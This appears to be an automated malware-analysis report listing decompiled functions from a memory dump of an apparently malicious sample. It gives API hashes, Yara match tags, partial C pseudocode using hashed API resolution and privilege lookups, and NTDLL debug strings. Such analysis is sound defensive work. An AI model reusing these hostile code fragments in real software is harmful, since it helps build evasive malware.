Opcode ID: ca473478d73cfa9e0cf8e9a06564b9c8e5bc29eb80f4c758f1be952c1aa57ec1
Instruction ID: 96d8675dc7c60ceb6c3d86c93ed9a278e56698fd0fc30a151df372451fa0e495
Opcode Fuzzy Hash: ca473478d73cfa9e0cf8e9a06564b9c8e5bc29eb80f4c758f1be952c1aa57ec1
Instruction Fuzzy Hash: EA90026260100042414471A9C844D065005BBE1651751C166E0988554DC6998875AAA5

Uniqueness

Uniqueness Score: -1.00%

Function 01B79A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01B79A0A

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 015c6863d06761f26952a79bab31d049fdb1d7a14864b572a69183a67feda4f8
Instruction ID: 95d2251030a84fa68f1500bf62a334564f88a0ead9106a9fc69224ccbcb79912
Opcode Fuzzy Hash: 015c6863d06761f26952a79bab31d049fdb1d7a14864b572a69183a67feda4f8
Instruction Fuzzy Hash: 8F90027220140402D10471998814B0B1005A7D0742F51C056E1154559DC7658861B9B1

Uniqueness

Uniqueness Score: -1.00%

Function 01B79A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01B79A5A

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 093360bd5cfd33514a5d88be68c600c7106cc0f1efd0c752574f0fd418bc2ded
Instruction ID: 586ec0afaf7b87c2564c423ce36a2c8ad77e273e0e45cc77e9978a0e91cbbe7d
Opcode Fuzzy Hash: 093360bd5cfd33514a5d88be68c600c7106cc0f1efd0c752574f0fd418bc2ded
Instruction Fuzzy Hash: 0790026221180042D20475A98C14F071005A7D0743F51C15AE0144558CCA558871A961

Uniqueness

Uniqueness Score: -1.00%

Function 01B795D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01B795DA

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 63f3f63df155989167dee967229f07668763921d8f99aac2d2dd17c4d9f64e71
Instruction ID: 26b8ccae7d2e1ce35e59545a6a838f2a0c419c81c7772250f4df67f73b33ee7a
Opcode Fuzzy Hash: 63f3f63df155989167dee967229f07668763921d8f99aac2d2dd17c4d9f64e71
Instruction Fuzzy Hash: 439002A220200003410971998414A16500AA7E0641B51C066E1004594DC66588A1B565

Uniqueness

Uniqueness Score: -1.00%

Function 01B79540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01B7954A

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b8cf4d32d94ee963fcbd9fbc4dfdecf003f9dbae959531b237b6312a2881bae6
Instruction ID: 3f6632bb9e6d5ef4dfd0bf84f6835274c42379eaf03a9abf5f041f7c9584df48
Opcode Fuzzy Hash: b8cf4d32d94ee963fcbd9fbc4dfdecf003f9dbae959531b237b6312a2881bae6
Instruction Fuzzy Hash: 55900266211000030109B59947049071046A7D5791351C066F1005554CD7618871A561

Uniqueness

Uniqueness Score: -1.00%

Function 01B797A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01B797AA

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7e170ad22204339010213ab91ee55d28e17d57961ff52d69bae2fc3e0be07f65
Instruction ID: ebbd3fd2d66a67854849fb23312b42413e90b55d3e1bbb1fe81bdbf51d63fa01
Opcode Fuzzy Hash: 7e170ad22204339010213ab91ee55d28e17d57961ff52d69bae2fc3e0be07f65
Instruction Fuzzy Hash: D090026230100003D14471999418A065005F7E1741F51D056E0404558CDA558866A662

Uniqueness

Uniqueness Score: -1.00%

Function 01B79780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01B7978A

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a2e5bf771219ab63d9b0e96524175428d25b795b70075113e9731e7992e17655
Instruction ID: 57a062e8d994162f5811fb35777d9349387f42c76623dba82261e768fa3ec2f4
Opcode Fuzzy Hash: a2e5bf771219ab63d9b0e96524175428d25b795b70075113e9731e7992e17655
Instruction Fuzzy Hash: B790026A21300002D18471999408A0A1005A7D1642F91D45AE000555CCCA558879A761

Uniqueness

Uniqueness Score: -1.00%

Function 01B79FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01B79FEA

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a1cebd3241e09de3da09d061c9b61b567ba093e7ae307314495fc9483a813811
Instruction ID: d9cf1ade63efaa268c0427a90a5afa761a972ec61902a9e14715f0cddd06cd15
Opcode Fuzzy Hash: a1cebd3241e09de3da09d061c9b61b567ba093e7ae307314495fc9483a813811
Instruction Fuzzy Hash: 4D90027231114402D1147199C404B061005A7D1641F51C456E081455CDC7D588A1B562

Uniqueness

Uniqueness Score: -1.00%

Function 01B79710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01B7971A

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6164c882912a3771736719461be9fa4d973eba6bcfa175639a3f70d301669277
Instruction ID: a15d3fa30d3bc80b3c71afa6be4581844337495048a568c2edcc49e903ab038f
Opcode Fuzzy Hash: 6164c882912a3771736719461be9fa4d973eba6bcfa175639a3f70d301669277
Instruction Fuzzy Hash: 2A90027220100402D10475D99408A461005A7E0741F51D056E5014559EC7A588A1B571

Uniqueness

Uniqueness Score: -1.00%

Function 01B796E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01B796EA

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 28ddf876ee218f90d9270373d07660085ebb9545db1e823b5e199ed42d12244d
Instruction ID: 4d6725392a57222e59239b3397dd9292e6bfdf549155107125c9ca07cac9911f
Opcode Fuzzy Hash: 28ddf876ee218f90d9270373d07660085ebb9545db1e823b5e199ed42d12244d
Instruction Fuzzy Hash: B090027220108802D1147199C404B4A1005A7D0741F55C456E441465CDC7D588A1B561

Uniqueness

Uniqueness Score: -1.00%

Function 01B79660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01B7966A

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ca0b9c756804bb632800eb966849a10fd628a28cd8416c3590574cfbcc546e35
Instruction ID: 0eb55f2d4b05faa91577fa076f2d405c1b5078efcb63ce57673715776fcee92e
Opcode Fuzzy Hash: ca0b9c756804bb632800eb966849a10fd628a28cd8416c3590574cfbcc546e35
Instruction Fuzzy Hash: C690027220100802D18471998404A4A1005A7D1741F91C05AE0015658DCB558A69BBE1

Uniqueness

Uniqueness Score: -1.00%

Function 004088C0, Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.792786425.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
Instruction ID: 4c2b1df36aa7b29bb0fae7ecfb93cd688d28708cc461f9fe29ca3c1f3973371e
Opcode Fuzzy Hash: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
Instruction Fuzzy Hash: EC213CB2D442085BCB10E6649D42BFF73AC9B50304F04057FF989A3181FA38BB498BA7

Uniqueness

Uniqueness Score: -1.00%

Function 00418515, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418548

Strings

E|@D, xrefs: 0041857F

Memory Dump Source

Source File: 0000000B.00000002.792786425.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID: E|@D
API String ID: 621844428-1370303659
Opcode ID: dbd7b8358e2006b7a90c567e9fd5709ad190cd760816bccfedbebffaf2b716fc
Instruction ID: 4227223b611c28a36156af96a4075fe15eec744a60af6375aa2e1303c9a56b4d
Opcode Fuzzy Hash: dbd7b8358e2006b7a90c567e9fd5709ad190cd760816bccfedbebffaf2b716fc
Instruction Fuzzy Hash: 1E0100B2210108BFDB14DFA9DC80EEB77ADAF8C750F058248FA4CD7241C630E9008BA4

Uniqueness

Uniqueness Score: -1.00%

Function 004184A0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004184A0(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;

				E00418DD0(_a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x413526
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}

0x004184b7
0x004184c2
0x004184cd
0x004184d1

APIs

RtlAllocateHeap.NTDLL(&5A,?,00413C9F,00413C9F,?,00413526,?,?,?,?,?,00000000,00408B03,?), ref: 004184CD

Strings

&5A, xrefs: 004184C2, 004184CC

Memory Dump Source

Source File: 0000000B.00000002.792786425.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID: &5A
API String ID: 1279760036-1617645808
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 6eed1dfa6fdd4b996c8079955bb5808ea645f65af4e2973490dba1d49a230398
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 94E012B1200208ABDB14EF99DC41EA777ACAF88654F118559BA085B282CA30F9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 00407216, Relevance: 1.6, APIs: 1, Instructions: 84
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00407216(void* __esi, void* __eflags, intOrPtr* _a4, long _a8, intOrPtr _a16) {
				char _v63;
				char _v64;
				char _v520;
				void* __ebp;
				void* _t13;
				void* _t17;
				int _t18;
				short* _t27;
				long _t36;
				int _t42;
				void* _t46;
				void* _t49;

				asm("das");
				if(__eflags > 0) {
					_t46 = _t49;
					_push(__esi);
					_v64 = 0;
					E00419D30( &_v63, 0, 0x3f);
					E0041A910( &_v64, 3);
					_t17 = E00409B30(__eflags, _a8 + 0x1c,  &_v64); // executed
					_t18 = E00413E40( &_v64, _a8 + 0x1c, _t17, 0, 0, 0xc4e7b6d6);
					_t42 = _t18;
					__eflags = _t42;
					if(_t42 != 0) {
						_t36 = _a8;
						_t18 = PostThreadMessageW(_t36, 0x111, 0, 0); // executed
						__eflags = _t18;
						if(__eflags == 0) {
							_t18 =  *_t42(_t36, 0x8003, _t46 + (E00409290(__eflags, 1, 8) & 0x000000ff) - 0x40, _t18);
						}
					}
					return _t18;
				} else {
					asm("out dx, al");
					if(__eflags >= 0) {
						while(1) {
							_t27 = _t27 - 2;
							_t13 = _t13 - 1;
							if(_t13 == 0) {
								break;
							}
							if( *_t27 != 0x5c) {
								 *_t27 = 0;
								continue;
							}
							break;
						}
						E00419CB0(_a16,  &_v520, E00419FA0( &_v520) + _t22);
						return 0;
					} else {
						__esi = __esi - 1;
						_pop(es);
						asm("insb");
						__ebp = __esp;
						__ecx = E004195E0(__ecx);
						__eflags = __ecx;
						if(__ecx == 0) {
							L11:
							__eax = 0;
							__eflags = 0;
							return 0;
						} else {
							__eflags = __ecx - 0x33333333;
							if(__ecx == 0x33333333) {
								goto L11;
							} else {
								_a4 =  *_a4;
								__eax =  *_a4 + __ecx;
								__eflags = __eax;
								return __eax;
							}
						}
					}
				}
			}

0x00407217
0x00407218
0x00407271
0x00407276
0x0040727f
0x00407283
0x0040728e
0x0040729e
0x004072ae
0x004072b3
0x004072b8
0x004072ba
0x004072bd
0x004072ca
0x004072cc
0x004072ce
0x004072eb
0x004072eb
0x004072ed
0x004072f2
0x0040721a
0x0040721a
0x0040721b
0x004071de
0x004071de
0x004071e1
0x004071e2
0x00000000
0x00000000
0x004071d7
0x004071db
0x00000000
0x004071db
0x00000000
0x004071d7
0x004071fe
0x0040720e
0x0040721d
0x0040721d
0x0040721e
0x0040721f
0x00407221
0x00407228
0x0040722a
0x0040722c
0x0040723f
0x0040723f
0x0040723f
0x00407242
0x0040722e
0x0040722e
0x00407234
0x00000000
0x00407236
0x00407239
0x0040723b
0x0040723b
0x0040723e
0x0040723e
0x00407234
0x0040722c
0x0040721b

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072CA

Memory Dump Source

Source File: 0000000B.00000002.792786425.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: fd32d859f94e3cf0c392817a6d4359745c339affe51104d0b687edd1d776d7a7
Instruction ID: 7109bbb991fdf912460e6e7da75be2a2eda6dfed5695065a9f7aaaca08cafc14
Opcode Fuzzy Hash: fd32d859f94e3cf0c392817a6d4359745c339affe51104d0b687edd1d776d7a7
Instruction Fuzzy Hash: B8110A72A5021877E720AA959C02FFF736C9B40755F04456EFE04FA1C2E6686D0586EA

Uniqueness

Uniqueness Score: -1.00%

Function 00407270, Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00407270(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E00419D30( &_v67, 0, 0x3f);
				E0041A910( &_v68, 3);
				_t12 = E00409B30(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00413E40( &_v68, _a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409290(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}

0x00407270
0x0040727f
0x00407283
0x0040728e
0x0040729e
0x004072ae
0x004072b3
0x004072ba
0x004072bd
0x004072ca
0x004072cc
0x004072ce
0x004072eb
0x004072eb
0x00000000
0x004072ed
0x004072f2

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072CA

Memory Dump Source

Source File: 0000000B.00000002.792786425.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
Instruction ID: 34c16447600cfe3bfc53875ba7b31b7f06d917fb68e10caa6e1b72df1d8a1719
Opcode Fuzzy Hash: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
Instruction Fuzzy Hash: 9901D431A8022877E720A6959C03FFE776C5B00B55F05046EFF04BA1C2E6A87A0542EA

Uniqueness

Uniqueness Score: -1.00%

Function 00407248, Relevance: 1.6, APIs: 1, Instructions: 53threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072CA

Memory Dump Source

Source File: 0000000B.00000002.792786425.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 8a840cb28ff1e33a02ad9e9df0c8d95151aa571e20617932861940b3fc181e03
Instruction ID: da3a6e9d45043416cfa9cdbec6023a305af07c3c495b22726a29f441427c235a
Opcode Fuzzy Hash: 8a840cb28ff1e33a02ad9e9df0c8d95151aa571e20617932861940b3fc181e03
Instruction Fuzzy Hash: 65012B32A8022477E7256A519C02FFF77585F40B10F15446EFE40FA1C1E6A86E0146E9

Uniqueness

Uniqueness Score: -1.00%

Function 004185E9, Relevance: 1.6, APIs: 1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E004185E9(void* __eflags, void* _a4, void* _a8, void* _a12, void* _a16, void* _a20, void* _a24) {
				void* _v0;

				_push(ds);
				asm("enter 0x5198, 0x5e");
				if (__eflags < 0) goto L3;
			}

0x004185e9
0x004185ea
0x004185ef

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418670

Memory Dump Source

Source File: 0000000B.00000002.792786425.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 78d9a1c66bf5eeafbe0f22e9d33506c3ec061d8f3259051a5350ec4339e9cff1
Instruction ID: ca80fc1f8c0b5ba6e9bf3cd6a5179c8a0daf795dfb7e567b190296d2582f0ca9
Opcode Fuzzy Hash: 78d9a1c66bf5eeafbe0f22e9d33506c3ec061d8f3259051a5350ec4339e9cff1
Instruction Fuzzy Hash: D9012DB1200208ABDB14DF59DC85EEB77A9EF88754F018159FA0CA7291CA35E8118BB4

Uniqueness

Uniqueness Score: -1.00%

Function 00409B30, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409B30(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041AB60( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041AF80(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B200( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E00419310(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}

0x00409b4c
0x00409b4f
0x00409b54
0x00409b59
0x00409b63
0x00409b68
0x00409b6b
0x00409b6d
0x00409b75
0x00409b7a
0x00409b7a
0x00409b81
0x00409b89
0x00409b8c
0x00409b8e
0x00409ba2
0x00000000
0x00409ba4
0x00409baa
0x00409b5e
0x00409b5e
0x00409b5e

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BA2

Memory Dump Source

Source File: 0000000B.00000002.792786425.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction ID: 4e6e3ee69d5942d72351b9e79d7f2bfe549f68bd28f2ef5b77caac8f1f18b979
Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction Fuzzy Hash: BB0152B5E0010DA7DB10DAA1DC42FDEB378AB54308F0041A5E918A7281F635EB54C795

Uniqueness

Uniqueness Score: -1.00%

Function 00418633, Relevance: 1.5, APIs: 1, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00418633(void* __eax, void* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16, void* _a207838738) {
				intOrPtr _t15;
				int _t18;

				asm("insb");
				asm("popad");
				_t15 = _a4;
				E00418DD0(_t15, _t15 + 0xc8c,  *((intOrPtr*)(_t15 + 0xa18)), 0, 0x46);
				_t18 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t18;
			}

0x00418634
0x0041863c
0x00418643
0x0041865a
0x00418670
0x00418674

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418670

Memory Dump Source

Source File: 0000000B.00000002.792786425.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 90f318868fda79be8194bb452e3e2daf2a668c7fb4fe5bb8a769f3d761686a4f
Instruction ID: 4760727413bcc44461471d0cbbd1d5dbe71ba29d5a1f9263521f6d69c359e195
Opcode Fuzzy Hash: 90f318868fda79be8194bb452e3e2daf2a668c7fb4fe5bb8a769f3d761686a4f
Instruction Fuzzy Hash: 81F0E5712002046FCB10DF94DC41EEB37A9DF86360F108158FD4857282C570E8118BE1

Uniqueness

Uniqueness Score: -1.00%

Function 004184E0, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004184E0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;

				_t3 = _a4 + 0xc74; // 0xc74
				E00418DD0(_a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x004184ef
0x004184f7
0x0041850d
0x00418511

APIs

RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041850D

Memory Dump Source

Source File: 0000000B.00000002.792786425.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: 3ff41463f96ddcb9b979ffb1c010e7f29050f08b507ceaebb1b5cb1da4dac703
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: A0E01AB12002086BD714DF59DC45EA777ACAF88750F014559B90857281C630E9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 00418640, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418640(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				intOrPtr _t7;
				int _t10;

				_t7 = _a4;
				E00418DD0(_t7, _t7 + 0xc8c,  *((intOrPtr*)(_t7 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}

0x00418643
0x0041865a
0x00418670
0x00418674

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418670

Memory Dump Source

Source File: 0000000B.00000002.792786425.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: efef6450e86da2b54d6b49fe3c32415886d6c73e427b64be19593e81b86a73e4
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 1CE01AB12002086BDB10DF49DC85EE737ADAF88650F018159BA0857281C934E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 00418520, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418520(intOrPtr _a4, int _a8) {

				_t5 = _a4;
				E00418DD0(_a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}

0x00418523
0x0041853a
0x00418548

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418548

Memory Dump Source

Source File: 0000000B.00000002.792786425.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: 0124507ddd2f9c2d15af78755faa13525d8eeaf852c7518965348cd9efebe569
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: A8D012716003187BD620DF99DC85FD7779CDF48790F018169BA1C5B281C571BA0086E1

Uniqueness

Uniqueness Score: -1.00%

Function 00418678, Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418670

Memory Dump Source

Source File: 0000000B.00000002.792786425.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6f536b0b01077d86152a2a3cf023b86940099eef3e14c1d7fc89a8486a09fe24
Instruction ID: ee1d7efd5f3ea44847b9cd03a0cf9f7254f66b341a6ca6350b49b3692a2dcd93
Opcode Fuzzy Hash: 6f536b0b01077d86152a2a3cf023b86940099eef3e14c1d7fc89a8486a09fe24
Instruction Fuzzy Hash: 4EC08CBA64051C9FC620FA95E8089E7B39A9F85311320865AD85C1271099328DAA45A0

Uniqueness

Uniqueness Score: -1.00%

Function 01B7967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01B79694

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5f5ad39bc7cc6e3ccd1efaa720b834c6a8d51c514f65b98fd1c5fd7f06491840
Instruction ID: c697d591fda33ce0721a23255b7887cbde82f15feb0b0db1f4cd3d1680da9149
Opcode Fuzzy Hash: 5f5ad39bc7cc6e3ccd1efaa720b834c6a8d51c514f65b98fd1c5fd7f06491840
Instruction Fuzzy Hash: 40B09B729014C5C5D715E7A44608F177900B7D0755F16C196E1120645B4778C091F5B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 01BEB260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON

Download Yara Rule

Strings

The resource is owned shared by %d threads, xrefs: 01BEB37E
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 01BEB476
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 01BEB2DC
read from, xrefs: 01BEB4AD, 01BEB4B2
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 01BEB305
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 01BEB39B
*** An Access Violation occurred in %ws:%s, xrefs: 01BEB48F
The instruction at %p referenced memory at %p., xrefs: 01BEB432
*** enter .cxr %p for the context, xrefs: 01BEB50D
*** A stack buffer overrun occurred in %ws:%s, xrefs: 01BEB2F3
an invalid address, %p, xrefs: 01BEB4CF
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 01BEB323
<unknown>, xrefs: 01BEB27E, 01BEB2D1, 01BEB350, 01BEB399, 01BEB417, 01BEB48E
The critical section is owned by thread %p., xrefs: 01BEB3B9
*** then kb to get the faulting stack, xrefs: 01BEB51C
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01BEB38F
